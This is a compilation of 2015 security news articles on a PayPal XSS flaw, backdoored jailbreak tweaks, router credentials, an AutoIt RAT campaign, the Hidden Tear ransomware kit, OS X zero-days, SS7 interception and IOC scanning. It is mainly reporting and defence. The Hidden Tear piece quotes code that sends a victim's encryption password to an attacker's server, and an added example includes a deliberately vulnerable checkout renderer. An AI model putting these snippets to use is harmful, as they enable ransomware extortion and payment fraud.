The U.S. officials believe that the 21-year-old Hussain was heavily involved in inspiring attacks and was their high-value target in ISIS.
Hussain was involved in the Garland, Texas, cartoon contest attack and helped ISIS obtain the passwords of the US Central Command's Twitter and YouTube accounts to send pro-ISIS messages.
The officials believe that the drone strike on Hussain's vehicle Tuesday was a great "intelligence success."
Hussain's death was the second airstrike conducted against ISIS leaders and militants. Last week's airstrike killed one of the senior ISIS members, Hajji Mutazz, in Iraq.
PayPal Vulnerability Allows Hackers to Steal All Your Money
27.8.2015
A critical security vulnerability has been discovered in the eBay owned global e-commerce business PayPal that could allow attackers to steal your login credentials, and even your credit card details in unencrypted format.
Egypt-based researcher Ebrahim Hegazy discovered a Stored Cross-Site Scripting (XSS) vulnerability in PayPal's Secure Payments domain.
As it sounds, the domain is used to conduct secure online payments when purchasing from any online shopping website. It enables buyers to pay with their payment cards or PayPal accounts, eliminating the need to store sensitive payment information.
However, it is possible for an attacker to set up a rogue online store or hijacked a legitimate shopping website, to trick users into handing over their personal and financial details.
How Does the Stored XSS Attack Work?
Hegazy explains a step-by-step process in his blog post, which gives a detailed explanation of the attack.
Here's what the researcher calls the worst attack scenario:
The attacker needs to set up a rogue shopping site or hijack a legitimate shopping site
The attacker then modifies the "CheckOut" button with a URL designed to exploit the XSS vulnerability
Whenever PayPal users browse the malformed shopping website and click on the "CheckOut" button to pay with their PayPal account, they are redirected to the Secure Payments page
The page actually displays a phishing page where the victims are asked to enter their payment card information to complete the purchase
Now, on clicking the Submit Payment button, instead of paying the product price (let's say $100), the PayPal user will pay the attacker an amount of the attacker's choice
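As an added illustration of the bug class above (not PayPal's code and not Hegazy's proof of concept), here is a checkout page renderer in a vulnerable form and a hardened one. It assumes, as a constructed setup, that the page is built from a merchant name and an amount carried in the CheckOut URL; the hardened version escapes every reflected value and takes the amount from a server-side order record.

```python
"""Added example, not PayPal's code: a checkout page renderer in the
vulnerable form implied by the attack steps above and in a hardened form.

Constructed assumptions: the page is built from a merchant name and an
amount carried in the CheckOut URL; the hardened version escapes every
reflected value and takes the amount from a server-side order record.
"""
from decimal import Decimal
from html import escape
from urllib.parse import parse_qs, urlsplit

# Constructed server-side order store standing in for a real database.
ORDERS = {"ord-1001": {"merchant": "Example Shop", "amount": Decimal("100.00")}}


def _param(url: str, name: str) -> str:
    """First value of a query parameter, or '' when absent."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_vulnerable(checkout_url: str) -> str:
    """Reflects URL parameters straight into the HTML, so a crafted CheckOut
    link can inject markup into the payment page and display any amount:
    the class of bug the steps above describe."""
    merchant = _param(checkout_url, "merchant")
    amount = _param(checkout_url, "amount")
    return (f"<h1>Pay {merchant}</h1><p>Total: ${amount}</p>"
            "<form><input name=card><button>Submit Payment</button></form>")


def render_hardened(checkout_url: str) -> str:
    """Two fixes: (1) nothing from the URL reaches the page unescaped;
    (2) the amount is read from the order the server already holds, so
    the link cannot change what the buyer pays."""
    order_id = _param(checkout_url, "order")
    order = ORDERS.get(order_id)
    if order is None:
        # The untrusted id is reflected, but only after HTML-escaping.
        return f"<p>Unknown order {escape(order_id, quote=True)}.</p>"
    merchant = escape(order["merchant"], quote=True)
    return (f"<h1>Pay {merchant}</h1><p>Total: ${order['amount']:.2f}</p>"
            "<form><input name=card><button>Submit Payment</button></form>")


if __name__ == "__main__":
    probe = "https://pay.example/checkout?merchant=<b>x</b>&amount=1&order=<b>x</b>"
    print(render_vulnerable(probe))   # markup from the URL lands in the page
    print(render_hardened(probe))     # escaped, and no amount from the URL
    print(render_hardened("https://pay.example/checkout?order=ord-1001&amount=1"))
```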
Video Demonstration
The researcher has also provided a proof-of-concept (PoC) video that shows the attack in action. You can watch the video here.
Hegazy reported this serious security vulnerability to the PayPal team on June 19th, and the team confirmed the security hole, which was fixed on August 25 – just over two months later.
PayPal has also rewarded Hegazy with a bug bounty of $750 for his findings, which is the company’s maximum bug bounty payout for XSS vulnerabilities.
Apple iOS Jailbreak Tweaks Have Backdoors; 220,000 iCloud Accounts Hacked
27.8.2015
Jailbreakers Beware!
Some shady tweaks that you installed on your jailbroken devices are looking to steal your iCloud login credentials, a report says.
The iCloud account details, including email addresses and passwords, of nearly 220,000 jailbreak users have been breached, the Chinese online vulnerability-reporting platform WooYun reported.
WooYun is an information security platform where researchers report vulnerabilities and vendors give their feedback.
Backdoor Privacy Attack
The security breach, according to the website, was a result of 'backdoor privacy attack' caused by the installation of a malicious jailbreak tweak.
It appears that hackers are using a variety of "built-in backdoors" in numerous malicious jailbreak tweaks to acquire victims' iCloud account information.
Once installed, these malicious tweaks transferred the iCloud login details of the jailbreak users to an unknown remote server.
So far, it is unclear who is behind the attack and what they intend to do with the stolen iCloud accounts. But the report states that WooYun has notified the appropriate vendors – apparently Apple – about the issue and is awaiting processing.
For just one jailbreak tweak, 220,000 is a huge number. It is believed, though, that a number of malicious jailbreak tweaks have been used by the criminals, many of them posted as free versions of popular paid tweaks.
Who is Affected?
The security flaw has nothing to do with Apple's security and affects only iOS users who have jailbroken their devices.
However, with such a large number of compromised iCloud accounts, it appears that the attack could be the result of a more organized method, possibly a pre-installed backdoor.
As pointed out by Reddit user ZippyDan, Chinese market traders often sell iPhones and iOS devices that are pre-jailbroken. Many of these devices may have been passed on with the shady tweaks already installed.
How to Protect Yourself?
It is unrealistic to tell you not to jailbreak your device, but there are some necessary steps you can take to tighten up your device security.
Here are some steps that you should implement to help protect yourself:
Enable two-factor authentication for your iCloud account
Do not add shady third-party repositories to Cydia
Do not install jailbreak tweaks from unknown and untrusted sources
Do not pirate tweaks or apps
If you have already enabled two-step authentication, it will prevent someone else from accessing your iCloud account even if they have your email address and password.
CERT Warns of Hard-Coded Credentials in DSL SOHO Routers
26.8.2015
DSL routers from a number of manufacturers contain hard-coded credentials that could allow a hacker to access the devices via telnet services and remotely control them. An advisory published Tuesday by the DHS-sponsored CERT at the Software Engineering Institute at Carnegie Mellon University said the issues are still present in the routers and that organizations could write firewall rules that block telnet or SNMP on the device as a temporary mitigation. Telnet network services are used by some manufacturers for remote support.
The affected routers are manufactured by ASUS Tek (DSL-N12E), DIGICOM (DG-5524T), Observa Telecom (RTA01N), Philippine Long Distance Telephone (SpeedSurf 504AN) and ZTE (ZXV10 W300). CERT had issued a similar advisory in February 2014 for the ZTE device, but yesterday expanded it to include the other vendors.
In May, a post to the Full Disclosure security mailing list from a group of security researchers from Universidad Europea de Madrid rattled off sundry vulnerabilities they found in 22 different small office and home office routers, including the hard-coded credentials in Observa Telecom routers.
“A remote attacker may utilize these credentials to gain administrator access to the device,” CERT said in its advisory. The hard-coded credentials include a user name of “admin” or some variation in all the devices, as well as similar passwords that include part of the router’s MAC address, which is obtainable over SNMP with the community string public, CERT said.
CERT said that Asus was notified in May and PLDT in June of the issues affecting their respective routers, while ZTE was notified in December 2013. Observa Telecom, a common router brand used in Spain by its major ISP Telefonica, suffered from a number of serious vulnerabilities, including persistent and unauthenticated cross-site scripting and cross-site request forgery on a number of its devices beyond the RTA01N in question here.
Home and small office routers are notoriously insecure and difficult to patch, since they require new firmware and often those updates must be manually installed because there is no automated mechanism. One of the biggest router disclosures came last December when Check Point Software Technologies published details on a vulnerability it called Misfortune Cookie. The flaw affected more than 12 million devices running an embedded webserver called RomPager; the vulnerability could give an attacker in a man-in-the-middle position access to traffic entering and leaving routers built by most manufacturers. An attacker need only send a single packet containing a malicious HTTP cookie to exploit the flaw. Such an exploit would corrupt memory on the device and allow an attacker to remotely gain administrative access to the device.
iOS Sandbox Vulnerability Puts Enterprise Data at Risk
26.8.2015
"Change is the only constant thing," as the saying goes, could now be amended to "Change is the only constant thing*," where the asterisk means terms and conditions apply!
Changes such as Mobile Device Management (MDM) solutions and Bring Your Own Device (BYOD) policies were brought to organizations (and later became necessities) for smooth workflow and management in organizations where mobile and other computing devices exist in large numbers.
Both the devices and the MDM solutions are now reported to be at risk.
Security researchers on the Appthority Mobile Threat Team have found a vulnerability in the app sandbox of Apple's iOS versions prior to 8.4.1 that allows the configuration settings of managed applications to be openly accessed by anyone.
QuickSand – Loophole in Sandbox
The vulnerability is assigned CVE-2015-5749 and is named 'QuickSand' because the loophole is in the sandbox.
Mobile Device Management (MDM) refers to managing the deployment, security and integration of all the mobile devices, including smartphones, tablets, and laptops, in an organization.
The aim of MDM solutions is to increase the use of mobile devices by keeping them secure within the enterprise while simultaneously protecting the corporate network.
MDM solutions are mostly dependent on vendors who implement the services based on their devices' management features.
MDM and EMM (Enterprise Mobility Management) solutions are delivered by vendors like FancyFon, AirWatch, MobileIron and AmTel MDM, allowing organizations to install corporate apps, including configuration and credentials, on their mobile devices.
This gives employees easy access to corporate resources.
Now, the researchers claim this violation is capable of affecting all MDM clients, as well as any mobile apps distributed via an MDM in a corporate environment that use the 'Managed App Configuration' setting to configure and store private settings and information.
Here's what the researchers at Appthority wrote in a blog post:
The underlying issue with our critical sandbox violation discovery is that not only can a mobile app (or the MDM app itself) have access to this sensitive set-up and authentication information stored on the device, but anyone (or any app on any device) can also see the credential [data] on the mobile device as it is stored 'world readable'.
How Does the Attack Work?
The attackers can fool users - in an environment where an MDM solution has been implemented - in two ways:
Pushing a malicious app to the whole organization, disguised as a productivity app that many users may install.
Targeting a particular user and luring them with attacks such as phishing.
This is a serious situation, in which the chances of an organization becoming the victim of a severe cyber attack are high. The sensitivity and volume of the information managed by MDM solutions matter.
As of today, the vulnerability may not be that critical in nature, but it has certainly opened the gates for potential attackers to get away with data and information.
Appthority and Apple security have worked together to fix the vulnerability, which so far has been patched only in iOS version 8.4.1.
Further, the Appthority Mobile Threat Team has demonstrated the weakness with the MDM and provides some recommendations; you can visit their official blog for in-depth details.
AutoIt Used in Targeted Attacks to Move RATs
26.8.2015
Hackers, months ago, revived macros as an attack vector, primarily to hide banking malware spread by spam campaigns. Not to be left out, some targeted attacks, kicked off by convincing phishing emails, have been moving a few remote access Trojans and other malware via Word docs. One particular targeted campaign, researchers at Cisco said, was using AutoIt to drop malware on compromised machines. AutoIt is freeware that allows Windows administrators to write scripts that automate tasks.
The use of macros by hackers is mitigated by the fact they’ve been disabled by default since the release of Office 2007. But Cisco researchers said the language and spoofed senders in the phishing emails accompanying the targeted attacks could be enough to convince a potential victim to enable macros and execute the attack.
“In this case, they’re impersonating a legitimate business. If the message is convincing enough, they could lower their guard and enable macros if they believe doing so will fully render a document or allow them to see the encoding of images a document may contain,” said Cisco Talos threat researcher Alex Chiu. “We’ve seen these techniques used with several targeted Dridex campaigns. They’re taking techniques that are old, and in this case, making them useful again.”
The use of AutoIt is not only unique, but effective in allowing the attackers to evade detection. AutoIt is a legitimate IT administration tool and could be whitelisted in many enterprises. In the case of this particular campaign, the victim is urged to enable macros on a Word document that pretends to be from a legitimate business. Once the victim executes the attack, it reaches out to hxxp://frontlinegulf[.]com/tmp/adobefile.exe where it downloads a binary. The payloads change regularly, Cisco said. AutoIt was one such payload, downloaded in a self-extracting archive.
In addition to AutoIt, a 600MB AutoIt script was downloaded from the archive that included anti-analysis checks, payload decryption, malware installation and persistence mechanisms. The script also installed either the Cybergate RAT, NanoCore RAT, or the Parite worm. The RATs were used against a small number of organizations, Chiu said.
The large AutoIt script would likely evade antivirus or intrusion detection systems that have file-size limits. Chiu said too that it looks for a particular antivirus installation and, if detected, it sleeps for a defined period of time before executing. Once it does execute, it tries to disable Windows User Account Control (UAC) in order to establish persistence on the machine and continue decrypting its payload.
“Adversaries are using legitimate freeware to fly under the radar,” Chiu said. “It can hide as white noise because it appears as a management task.” Chiu said it’s unknown whether the targeted organizations already were using AutoIt in their environments.
As for the RATs, NanoCore was spotted in attacks against energy companies in Asia and the Middle East before, earlier this year, source code for the RAT and its premium plugins was leaked online, making it widely accessible. Cybergate, meanwhile, has been available for years online and is considered easy to set up and use.
In January, Microsoft warned companies of a spike in macro-enabled malware. It said in December attacks peaked at fewer than 8,000 a day for a short time. Like the current campaign spotted by Cisco, victims were enticed to enable macros and were ultimately infected by either the Ardnel or Tarbir downloader, which grabbed any variety of malware from there.
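As an added example, not Cisco's or any vendor's tooling, here is a mail-gateway style check that flags a document carrying a VBA macro project before it reaches a user, which is the lure this campaign depends on. It relies on the fact that OOXML documents are ZIP archives whose macro project is stored in a vbaProject.bin part; legacy OLE .doc files are out of scope, and the sample documents are constructed in memory.

```python
"""Added example (not Cisco's code): flag Office documents that carry a
VBA macro project, the lure the campaign above relies on.

OOXML documents (.docx/.docm/.xlsm/.pptm) are ZIP archives; a macro
project lives in a vbaProject.bin part (e.g. word/vbaProject.bin).
Legacy OLE files (.doc) are out of scope here. The sample documents
are constructed in memory so the example runs offline.
"""
import io
import zipfile

VBA_PART_SUFFIX = "vbaproject.bin"


def has_vba_project(data: bytes) -> bool:
    """True if the OOXML archive contains a VBA project part.
    Non-ZIP input (a legacy .doc, or a renamed EXE) returns False."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(name.lower().endswith(VBA_PART_SUFFIX)
                       for name in zf.namelist())
    except zipfile.BadZipFile:
        return False


def classify(filename: str, data: bytes) -> str:
    """Combine the content check with the extension, since the lure is a
    document that looks like a plain business file.
    Returns 'clean', 'macro' or 'extension-mismatch'."""
    macro = has_vba_project(data)
    ext = filename.rsplit(".", 1)[-1].lower()
    if macro and ext in ("docx", "xlsx", "pptx"):
        # A macro project inside an extension that is supposed to be
        # macro-free: the mismatch itself is worth quarantining.
        return "extension-mismatch"
    return "macro" if macro else "clean"


def build_sample(with_macro: bool) -> bytes:
    """Constructed minimal .docx/.docm archive for the demonstration."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed stub")
    return buf.getvalue()


if __name__ == "__main__":
    for name, doc in (("invoice.docx", build_sample(False)),
                      ("invoice.docm", build_sample(True)),
                      ("invoice.docx", build_sample(True))):
        print(name, classify(name, doc))
```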
Ashley Madison Hacker – An Insider Woman Employee?
26.8.2015
"Ashley Madison was not hacked!"
So declares John McAfee, founder of the antivirus software company McAfee.
By now everyone must be aware of the massive Ashley Madison data breach. Last week, the hackers, who call themselves Impact Team, posted 10GB of personal data for tens of millions of its customers, including their names and email addresses.
That was soon followed by another leak, in which the hackers released another 20GB of the company's internal data, including personal emails from Noel Biderman, the CEO of Ashley Madison's parent company Avid Life, along with the source code for its website and mobile apps.
John McAfee: Ashley Madison is an Inside Job by a Woman
However, in a post published in the International Business Times, McAfee made a controversial statement saying, "Ashley Madison was not hacked," and claiming that the alleged data breach was "an inside job."
McAfee says Ashley Madison's data was plundered by an ex-employee: a female ex-employee who worked for Toronto-based Avid Life Media, the parent company of the adultery website Ashley Madison.
The reason, no doubt, sounds good enough, but I wonder where he got this idea from. Snowden?
Conclusions by McAfee
McAfee claims that he discovered this by poring over the 40 gigabytes of hacked database leaked so far by the alleged hacking group, which calls itself the Impact Team.
Data analysis has led him to draw three conclusions:
The hack was a solo affair
The breach was perpetrated by an insider
A woman is behind it
McAfee's Evidence for his Conclusions
To prove his first claim that the hack was a solo affair, McAfee provided the details in his July post on IBTimes. He wrote, "I cannot tell you how I know, but the simple published data should help point to this fact."
Here's what he says for his conclusion that the hack was perpetrated by an insider:
How did I discover that it was an inside job?
From the [leaked data], it was clear that the perpetrator had intimate knowledge of the technology stack of the company...The data contains actual MySQL database dumps. [It] is not just someone copying a table and making into a .csv file. Hackers rarely have full knowledge of the technology stack of a target.
Now at last, Why a Woman?
McAfee says the attacker used words like "scumbags" and "cheating dirtbags" when referring to men, and that her mention of someone who "spitefully" joined Ashley Madison the day after Valentine's Day is decidedly feminine.
"If this does not convince you then you need to get out of the house more often," McAfee says.
Wait, what? Is he telling me to get out?
Okay, that is an understatement.
Well, we know McAfee is a bit of a character in the cyber security world. He is always embroiled in controversies, like the killing of his neighbor, claiming to be the target of assassins, or being arrested for driving while under the influence.
However, on the other side, McAfee is a well-established name in cyber security, an innovator who made millions through the anti-virus software company named after him.
As for the hacker(s), Avid Life Media is offering a cash reward of up to $500,000 for information leading to the arrest of the hackers who breached the data of Ashley Madison.
Well, The Hacker News lets you draw your own conclusions. So let us know your thoughts about the reasons given by John McAfee. Hit the comments below.
Meet Linux's New Fastest File-System – Bcachefs
24.8.2015
Five years after first announcing it, ex-Google engineer Kent Overstreet is pleased to announce the general availability of a new open-source file-system for Linux, called the Bcache File System (or Bcachefs).
Bcachefs is a Linux kernel block layer cache that aims at offering a speedier and more advanced way of storing data on servers.
Bcachefs promises to provide the same performance and reliability as the established EXT4 and XFS file systems while having the features of the ZFS and Btrfs file systems.
Features that Bcachefs Supports
Bcachefs supports all the features of a modern file-system, including:
Checksumming to ensure data integrity
Compression to save space
Caching for quick response
Copy-on-Write (COW) that offers the ability for a single file to be accessed by multiple parties at once
What's coming next for Bcachefs
Some of the features in Bcachefs are still limited or missing, including:
Snapshots
Erasure coding
Writeback caching between tiers
Native support for SMR (Shingled Magnetic Recording) drives and raw flash
However, in the future, Bcachefs will support all the advanced features, including Snapshots that allow the operating system to automatically make backups of data.
So far, the Bcachefs on-disk format has not been finalized, and the code is not ready for the Linux kernel.
The initial performance results are okay and "It probably won't eat your data – but no promises," Overstreet said in an e-mail to the Linux Kernel Mailing List late Thursday.
To try out Bcachefs for yourself, you can grab the code from here. But do not expect 'completed' code anytime soon, as Overstreet warns that "Bcachefs won't be done in a month (or a year)." So we recommend you wait a little longer.
For more details about Bcachefs and its current limitations, you can go here to read its official announcement.
Script Kiddies can Now Create their Own Ransomware using This Kit
24.8.2015
Don't panic! You heard it right.
A Turkish security researcher named Utku Sen has posted fully functional ransomware code on the open-source code-sharing website GitHub.
The ransomware, dubbed Hidden Tear, uses AES encryption to lock down files before displaying a ransom message to get users to pay up.
The currently undetectable version of ransomware can be modified and implemented accordingly, as it contains every feature a cybercriminal can expect from modern malware.
Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.
The Hidden Tear — Free Ransomware Kit
The "Hidden Tear" Ransomware package consists of four files namely:
Hidden-Tear-Decrypter
Hidden-Tear
.gitignore
README.md
Hidden Tear Ransomware is capable of:
Using AES algorithm to encrypt files
Sending encryption key to a server
Encrypting files and decrypting them using a decrypter program with the encryption key
Creating a text file on the Desktop with a given message
Small file size (12 KB)
Evading detection by all standard anti-virus programs
How to Set Up your Custom Ransomware Using Hidden Tear?
Sen has also specified usage details; he says:
1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):
string targetURL = "https://www.example.com/hidden-tear/write.php?info=";
2. The script should write the GET parameter to a text file. The sending process runs in the SendPassword() function:
string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var content = new System.Net.WebClient().DownloadString(fullUrl);
3. Target file extensions can also be changed. Default list:
var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};
For Educational Purpose... REALLY!
Wait! Sen has something more to say, listening to which you might think...REALLY!!
With the whole project "Hidden Tear," there's an attached legal warning that says:
"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."
Somebody should ask him… Why instigate people to commit a crime? One can imagine what such "Educational Purposes" will look like, as there is a big chance of this ransomware popping up in attacks soon.
A visit to the Video Demonstration of the sandbox testing of 'Hidden Tear' will give a real picture of what all it is capable of doing.
How to Protect Yourself from Ransomware Threat?
Two months ago, we introduced you to a free Ransomware Decryption and Malware Removal ToolKit that could help you deal with various variants of ransomware, as well as help you unlock encrypted files without paying off the cyber crooks.
However, there are some important steps that should be considered to protect yourself from Ransomware threats.
Always keep regular backups of your important data.
Make sure you run an active anti-virus security suite of tools on your system.
Do not open email attachments from unknown sources.
Most importantly, always browse the Internet safely.
RaspBSD – FreeBSD distribution for Raspberry Pi
24.8.2015
Raspberry Pi is reaching new heights as it rapidly matures: after Microsoft made Windows 10 IoT Core support the Raspberry Pi 2, a new build of the FreeBSD operating system, called RaspBSD, is now also deployable on Raspberry Pi devices.
FreeBSD (Berkeley Software Distribution) is an open source Unix-like advanced computer operating system used to power modern servers, desktops and embedded systems.
Though FreeBSD-CURRENT has supported Raspberry Pi since November 2012 and Raspberry Pi 2 since March 2015, RaspBSD will support the Pi models B and B+.
As Raspberry Pi is a full-fledged ARM system, FreeBSD/ARM joins the list of third-party operating systems that support Raspberry Pi.
This is not an official release as yet; the FreeBSD developers have made a beta image available for users to play around with the operating system and give their feedback and suggestions on the issues they encounter.
RaspBSD Available For Download
A stable, more robust and bug-free FreeBSD/ARM is expected to be introduced as the official OS for the Pi by the FreeBSD organisation at some point, says the Raspberry Pi's official blog.
Raspberry Pi is supported by the crochet build tool, a tool for creating bootable FreeBSD images. You will need an SD card of 4GB or more to ‘dd’ this image to:
Torrent - freebsd-pi-r245446.img.gz.torrent
Direct download - freebsd-pi-r245446.img.gz
SHA-1 - 65db3507b3c6f448d34068ca2a11f915d1b6b8f8
Default login - Username: root Password: freebsdarm
Alie Tan who developed the image describes FreeBSD/ARM features as:
Compiled with native FreeBSD GCC 4.2.1, tmps, 512MB swap partition with debug module off.
"Keep in mind that this image is based on FreeBSD10-CURRENT which is the 'bleeding edge' of FreeBSD development and not ready for production yet," Tan says.
As the new OS is not a stable release, users may face some problems with network throughput, DMA, some packages not compiling and high-speed SD card issues, to name a few.
Download RaspBSD Now!
To tag along with FreeBSD/ARM, NetBSD operating system also released a testing image for Raspberry Pi.
This is indeed "The Power to serve," as the FreeBSD slogan says. You can download and play with the new OS from Raspbsd.org
Apple Mac OS X Hits by Two Unpatched Zero-day Flaws
24.8.2015
A few days after Apple patched the DYLD_PRINT_TO_FILE privilege-escalation vulnerability in OS X Yosemite, hackers have their hands on another zero-day bug in its operating system that allows them to gain root privileges on Mac computers.
Italian teenager Luca Todesco (@qwertyoruiop) has discovered two unknown zero-day vulnerabilities in Apple's Mac OS X operating system that could potentially be exploited to gain remote access to a Mac computer.
The 18-year-old self-described hacker has also posted details of his finding, with source code for an exploit, on GitHub, as well as software to mitigate the vulnerability.
OS X Zero-Day Exploit in the Wild
The hacker's exploit makes use of two system flaws (which he dubbed 'tpwn') in order to cause a memory corruption in OS X's kernel.
Due to the memory corruption, it is possible to circumvent kernel address space layout randomization, thereby bypassing the toughest level of security meant to keep attackers out.
The attacker then gains a root shell access to the Mac computer, allowing them to:
Install malicious programs
Create users
Delete users
Trash the system
Many more...
...even without the Mac owner's permission.
Todesco said he had reported the issue to Apple, but did not contact the company prior to the publication of the vulnerabilities.
Todesco faced criticism for contacting Apple only a few hours before publishing his findings online and not giving the company enough time to release a security fix.
No Way Out for Mac Users
The vulnerability affects Mac OS X version 10.9.5 through version 10.10.5, the latest official build of Apple's operating system.
Good news for Mac users who are running the latest beta of OS X El Capitan (also known as Mac OS X 10.11), as it appears that they aren't affected by the zero-day flaws.
Until Apple patches these critical flaws, you don't have any good options to prevent a skilled hacker from installing malware on your Mac computers, beyond using a third-party patch created by Todesco himself, called NullGuard.
However, installing a patch from a third party developer can be risky. Therefore, we advise you to thoroughly investigate the patch before installing, or it’s better to wait for an official patch certified by Apple.
Your GPS Location and Calls Can be Spied Using Network Vulnerability
24.8.2015
Yes, you heard it right. It is the dirty truth behind what is being called the largest privacy breach ever.
Billions of cell phone users are at risk from a vulnerability in the SS7 inter-carrier network that allows hackers and spy agencies to track locations and intercept all voice calls from anywhere in the world.
This is something we already know from last year's Snowden leaks, which revealed the National Security Agency's (NSA) capability to gather nearly 5 billion records a day on mobile phone locations around the world.
But, it's worse than we have thought.
The famous Australian TV programme "60 Minutes" demonstrated that it is possible for anyone to track cell phone location and intercept calls and text messages.
This time, not due to a security vulnerability in the phone's operating system, but due to a serious flaw in the very system our cell phones use to communicate with each other around the world – The global signaling system, called SS7.
What went Wrong?
Hackers take advantage of the SS7, which is unfortunately vulnerable.
SS7 or Signaling System Number 7 is a protocol suite used by most telecommunications operators throughout the world to communicate with one another when directing calls, texts and Internet data.
SS7 allows cell phone carriers to collect location information from cell phone towers and share it with each other. This means a United States carrier will find its customer, no matter if he or she travels to any other country.
Location Tracking, Calls Listening, Messages Intercepting using SS7
Successful exploitation of the bug in SS7 could let attackers listen to all your voice calls as well as track your exact GPS location.
This technique is commonly known as a "Man-in-the-Middle" (MitM) attack, where hackers intercept online traffic and then forward it back to the recipient.
Besides tracking cell phone users and intercepting their calls, this critical flaw also allows hackers to intercept the SMS verification codes used by banking applications.
Really Scary!
In a special report, 60 Minutes showed how German hackers intercepted and recorded a politician's mobile phone conversation, and tracked his movements, from Germany, thousands of miles away.
Since the SS7 network is used worldwide, the vulnerability in it puts Billions of cell phone users in danger.
Unfortunately, there isn't a fix yet, so the flaws in SS7 protocol will continue to be present even if your telephone carriers upgrade to more advanced technology.
How To Use WhatsApp Web Client on iPhone and Other iOS Devices
24.8.2015
WhatsApp Web client support is now available for iOS users.
That's right, now iOS users can access their instant messaging facility on the web; without taking the other route (via jailbreaking).
Eight months ago, on January 21, 2015, WhatsApp was made available on web browsers, and let Android, Windows Phone 8.0 and 8.1, Nokia S60, Nokia S40 Single SIM EVO, BlackBerry and BB10 smartphones enjoy the service.
However, there was no web solution for iOS users at that time because of limitations of the platform and high-security standards adopted by Apple, so they were forced to wait for the service.
However, iOS users' wait for WhatsApp Web is over now, and they can also enjoy WhatsApp Web – Same WhatsApp account on iPhone and desktops.
Yesterday, WhatsApp enabled its web client interface for iPhone users.
How to Use WhatsApp on iPhone and iOS Devices?
Interested WhatsApp users simply need to open Safari browser and navigate to http://web.whatsapp.com
A QR code will appear on the web page, which must be scanned with your iPhone using WhatsApp mobile application to activate the service.
By scanning the QR code that appears, users will automatically have paired their mobile WhatsApp with the WhatsApp Web client.
Because the WhatsApp Web client depended on the Google Chrome browser, it could not be activated on iOS, where the supported browser is Safari.
This could be one of the reasons why WhatsApp took so long to bring WhatsApp Web to Apple's iOS platform.
Now WhatsApp Web can also be accessed using the Safari browser, though the latest version of Safari is required.
Multiple Whatsapp Account, Whatsapp For Desktop, Whatsapp Update, Whatsapp Web, WhatsApp Web IOS
Indicators of compromise as a way to reduce risk
23.8.2015
Infrastructure owners must regularly check their resources for the presence of malicious components. One of the ways in which a resource may become infected is as a result of “zero-day” vulnerability exploitation by cybercriminals. In this case, the developers of security tools used to protect the information system may be as yet unaware of the new threat. At the same time, experts may be investigating incidents related to the new threat. Moreover, some findings of these investigations may already be publicly available.
Such reports have practical value. A typical report on an APT campaign includes the following information:
Attack victims and the objectives of cybercriminals;
List of victim nodes (IP addresses);
Current activity of malicious components and/or cybercriminal groups;
Detailed descriptions of tools and malicious components used by the cybercriminals;
Description of the command-and-control (C&C) server infrastructure;
Indicators of compromise.
Of all the detailed technical information on any given APT, “indicators of compromise” have the greatest practical value for security administrators. This is a set of data that can help an administrator of the corporate IT infrastructure to discover any malicious activity in the system and take appropriate action.
How should information system administrators use this data in practice? This paper is intended to provide an answer to this question.
An indicator of compromise is information on the signs of malicious activity, which is structured in such a way that it can be fed into automated tools designed to check the infrastructure for signs of infection. Although there is no generally accepted format for descriptions of these indicators, several types of structured data are widely used and supported in the industry.
IOC
IOC (indicator of compromise) – a list of threat data (e.g., strings defining file paths or registry keys) which can be used to detect a threat in the infrastructure using automated software-based analysis.
Simple IOC usage scenarios involve searching the system for specific files using a variety of search criteria: MD5 hashes, file names, creation dates, sizes and other attributes. Additionally, memory can be searched for various signs specific to the threat and the Windows registry can be searched for specific records.
This data can be presented in a variety of formats, one example of which is OpenIOC. The different formats enable the data to be imported into different security solutions to provide further processing of the indicators. An administrator can integrate IOCs taken from reports into such security solutions as:
Solutions of the Endpoint Security class
SIEM
IDS/IPS
HIDS/HIPS
Various incident investigation tools
There are many commercial solutions for working with IOC, but in many cases the capabilities of similar open-source programs are sufficient to check the target system for signs of infection. One example is Loki – an IOC scanner distributed under the GPL license, which can be used to search the target system for various indicators appearing as a result of malicious activity.
To scan the system using the Loki scanner, it is sufficient to unpack the archive containing the utility and add the relevant IOC attributes to the scanner’s knowledge base. The following IOC categories are located in the application’s folder named “signature”:
“filename-iocs” – a text file containing lists of file system attributes produced by the activity of various threats;
“hash-iocs” – a list of MD5, SHA1 and SHA256 hashes of malicious components that appear in the system after it is infected;
“falsepositive-hashes” – a list of exceptions: MD5, SHA1 and SHA256 hashes that are marked as false positives by the scanner when detecting the relevant components.
As an example, consider the report we released after an investigation of the Carbanak APT. Page 36 of the report lists the MD5 hashes of all malware components that may be present in the system as a result of this infection. We can open the scanner’s file named “hash-iocs” and enter a rule for this threat in the following format: <MD5>;<description> .
List of Carbanak APT components’ MD5 hashes in Loki scanner’s “hash-iocs” file
The next step is to create an indicator in the text file named “filename-iocs”, which describes malicious components’ attributes in the file system. The indicator should have the following format:
# COMMENT
# REGULAREXPRESSION;SCORE
IOC for the file system in Loki “filename-iocs” list
After entering the relevant indicators in the scanner’s knowledge base, we can launch a scan of the workstation. This requires launching the “loki.exe” executable with administrator privileges (otherwise the scanner will not be able to scan the contents of RAM for attributes) and waiting for the scan to complete.
The process of scanning using Loki utility
Upon completing the scan, the application will generate a report and save it in the program’s folder under the name “loki.txt”.
